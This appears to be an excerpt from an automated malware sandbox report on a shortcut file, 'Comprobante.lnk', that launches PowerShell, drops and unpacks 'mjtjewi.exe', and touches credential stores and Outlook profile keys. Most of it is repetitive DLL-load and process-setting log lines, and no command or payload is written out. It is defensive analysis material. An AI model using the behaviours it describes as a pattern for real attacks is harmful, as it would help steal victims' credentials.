Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Section loaded: cryptbase.dll	Jump to behavior

Source: C:\Users\user\Desktop\mjtjewi.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Comprobante.lnk.lnk

LNK file: ..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\mjtjewi.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Jump to behavior

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\mjtjewi.exe

Suspicious powershell command line found

Source: unknown

Yara detected aPLib compressed binary

Source: Yara match	File source: 6.2.mjtjewi.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.mjtjewi.exe.4a289b8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.mjtjewi.exe.4a289b8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.mjtjewi.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1494647068.0000000004A28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1481059801.0000000002FD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1481059801.0000000002FBA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1481059801.0000000002F98000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mjtjewi.exe PID: 6956, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mjtjewi.exe PID: 876, type: MEMORYSTR

PE file contains sections with non-standard names

Source: mjtjewi.exe.0.dr	Static PE information: section name: j1CM!e^U
Source: mjtjewi.exe.0.dr	Static PE information: section name:

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFE7DE700BD pushad ; iretd	0_2_00007FFE7DE700C1
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_00BB81B8 pushfd ; ret	4_2_00BB81BF
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_00BB79E2 push esp; retf	4_2_00BB79E8
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_01521503 push ss; retf	4_2_01521504
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_01521522 push ebp; retf	4_2_01521523
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 6_2_00402AC0 push eax; ret	6_2_00402AD4
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 6_2_00402AC0 push eax; ret	6_2_00402AFC

Source: mjtjewi.exe.0.dr

Static PE information: section name: j1CM!e^U entropy: 7.999315698306394

Persistence and Installation Behavior

Windows shortcut file (LNK) starts blacklisted processes

Source: LNK file

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Tries to download and execute files (via powershell)

Source: unknown

Drops PE files

Source: C:\Users\user\Desktop\mjtjewi.exe	File created: C:\Users\user\AppData\Roaming\188E93\31437F.exe (copy)			Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\Desktop\mjtjewi.exe			Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
